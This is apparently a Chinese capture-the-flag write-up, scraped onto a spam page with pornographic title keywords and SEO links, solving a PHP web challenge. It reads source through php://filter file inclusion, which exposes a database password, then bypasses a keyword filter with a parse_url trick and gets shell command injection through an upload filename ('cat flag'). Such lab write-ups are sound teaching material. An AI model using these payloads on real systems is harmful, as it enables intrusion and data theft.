中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

網(wǎng)站建設(shè)2019小說排行榜百度

news 2025/7/15 9:03:31
網(wǎng)站建設(shè)2019,小說排行榜百度,抖音代運(yùn)營(yíng)協(xié)議合同范本,龍口城鄉(xiāng)建設(shè)局官方網(wǎng)站目錄 信息收集 代碼審計(jì) parse_url解析漏洞 信息收集 進(jìn)入即是登錄頁(yè)面,抓包一看應(yīng)該是SQL注入,但是空格、%、|等等啥的都被waf了,不太好注入,先信息收集一波 花一分鐘掃下目錄,發(fā)現(xiàn)一個(gè)viminfo和register.php Viminfo文件…

目錄

信息收集

代碼審計(jì)?

parse_url解析漏洞?

信息收集

進(jìn)入即是登錄頁(yè)面,抓包一看應(yīng)該是SQL注入,但是空格、%、|等等啥的都被waf了,不太好注入,先信息收集一波

花一分鐘掃下目錄,發(fā)現(xiàn)一個(gè)viminfo和register.php

Viminfo文件是Vim用來記錄退出時(shí)的狀態(tài)

200  /index.php
200  /login.php
200  /register.php
200  /.viminfo
403  /.htaccessvim updateadmin.php
vim info.php
vim login.php

發(fā)現(xiàn)一個(gè)info.php和updateadmin.php,訪問的回顯都是you can not visit it directly,我們先注冊(cè)賬號(hào)

注冊(cè)admin時(shí)顯示?? ?Username has been registered!? ??

查看URL似乎是文件包含?用偽協(xié)議讀取下user源碼看看

/user.php?page=php://filter/convert.base64-encode/resource=user

代碼審計(jì)?

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

/user.php?page=php://filter/convert.base64-encode/resource=function

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>

/user.php?page=php://filter/convert.base64-encode/resource=config

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script><?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){echo "no sql connection".mysqli_connect_error();$mysqli=null;die();
}
?>

$keywords = ["flag","manage","ffffllllaaaaggg"]這三個(gè)頁(yè)面可能有重要信息

parse_url解析漏洞?

    $keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);

這里看下處理的邏輯

<?php
$a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
$uri = parse_url($a);
print_r($uri);
//parse_str($uri[''], $query);
?>

Array
(
? ? [scheme] => http
? ? [host] => 78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn
? ? [port] => 81
? ? [path] => /user.php
? ? [query] => page=guest
)

<?php
$a="http://78fc9602-02c3-44ec-80cc-3d0163ecb605.node4.buuoj.cn:81/user.php?page=guest";
$uri = parse_url($a);
//print_r($uri);
parse_str($uri['query'],$query);
print_r($query);
//parse_str($uri[''], $query);
?>

Array
(
? ? [page] => guest
)

我們這里查到PHP版本是5.5.9?

這里利用parse_url解析漏洞

///user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}else {echo "you can find sth in m4aaannngggeee";
}
?>
///user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";
?>

嘗試上傳文件,上傳失敗。發(fā)現(xiàn)/templates/upllloadddd.php

讀upllloadddd的源碼

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){die("error:can not move");}
}else{die("error:not an upload file??");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");

現(xiàn)在需要找到上傳點(diǎn),莫非是之前的user.php?page=updateadmin嗎?發(fā)現(xiàn)也沒有上傳處,最后看wp發(fā)現(xiàn)上傳點(diǎn)在/user.php?page=m4aaannngggeee,看兩者的頁(yè)面貌似是繼承來的?

貌似不能加/

filename=;cd ..;ls ;#

;cd ..;cat flag_233333;#

http://m.risenshineclean.com/news/48272.html

相關(guān)文章:

  • h5手機(jī)網(wǎng)站開發(fā)demo品牌的宣傳及推廣
  • 建網(wǎng)站和做微信哪個(gè)好百度賬號(hào)注冊(cè)入口
  • 江蘇藝居建設(shè)有限公司網(wǎng)站整合營(yíng)銷什么意思
  • python網(wǎng)站開發(fā) django桂平網(wǎng)絡(luò)推廣
  • 長(zhǎng)春網(wǎng)站建設(shè)方案seo服務(wù)內(nèi)容
  • icp網(wǎng)站負(fù)責(zé)人關(guān)鍵詞看片
  • 花都網(wǎng)站建設(shè) 駿域網(wǎng)站最好的推廣平臺(tái)排名
  • 網(wǎng)站開發(fā)培訓(xùn)學(xué)費(fèi)今日軍事新聞?lì)^條打仗
  • 設(shè)計(jì)師服務(wù)平臺(tái)官網(wǎng)seo網(wǎng)絡(luò)營(yíng)銷外包公司
  • 電子商務(wù)網(wǎng)站建設(shè)利益分析網(wǎng)絡(luò)推廣外包代理
  • 丹陽(yáng)論壇學(xué)生班級(jí)優(yōu)化大師
  • 凡客網(wǎng)站的域名怎么做seo優(yōu)化代理
  • 網(wǎng)站服務(wù)搭建開魯網(wǎng)站seo
  • 濟(jì)南網(wǎng)站建設(shè)優(yōu)化精準(zhǔn)客源app
  • 站群管理軟件百度軟件中心官網(wǎng)
  • 中企動(dòng)力做的網(wǎng)站被百度屏蔽seo第三方點(diǎn)擊軟件
  • 網(wǎng)站建設(shè)應(yīng)注重實(shí)用性湖北百度推廣電話
  • 男子做淫穢網(wǎng)站圖片seo優(yōu)化廠商
  • 網(wǎng)站建設(shè)管理報(bào)告免費(fèi)制作網(wǎng)站
  • 給關(guān)亨做網(wǎng)站的設(shè)計(jì)公司深圳關(guān)鍵詞推廣整站優(yōu)化
  • 視覺做的比較好的國(guó)外網(wǎng)站北京seo排名服務(wù)
  • 百度推廣電話客服湖南靠譜的關(guān)鍵詞優(yōu)化哪家好
  • 網(wǎng)站制作哪個(gè)軟件網(wǎng)站查詢域名
  • 深圳企業(yè)公司做網(wǎng)站手機(jī)優(yōu)化大師下載
  • 權(quán)重域名做網(wǎng)站有用么培訓(xùn)機(jī)構(gòu)是干什么的
  • 企業(yè)網(wǎng)絡(luò)營(yíng)銷實(shí)施方案seo優(yōu)化前景
  • 有什么免費(fèi)的wordpresswindows優(yōu)化大師是系統(tǒng)軟件嗎
  • 有什么網(wǎng)站可以接設(shè)計(jì)做網(wǎng)站運(yùn)營(yíng)需要多少錢
  • 怎樣做網(wǎng)站的鏈接百度競(jìng)價(jià)優(yōu)缺點(diǎn)
  • 企業(yè)的所得稅費(fèi)用怎么算沈陽(yáng)關(guān)鍵字優(yōu)化公司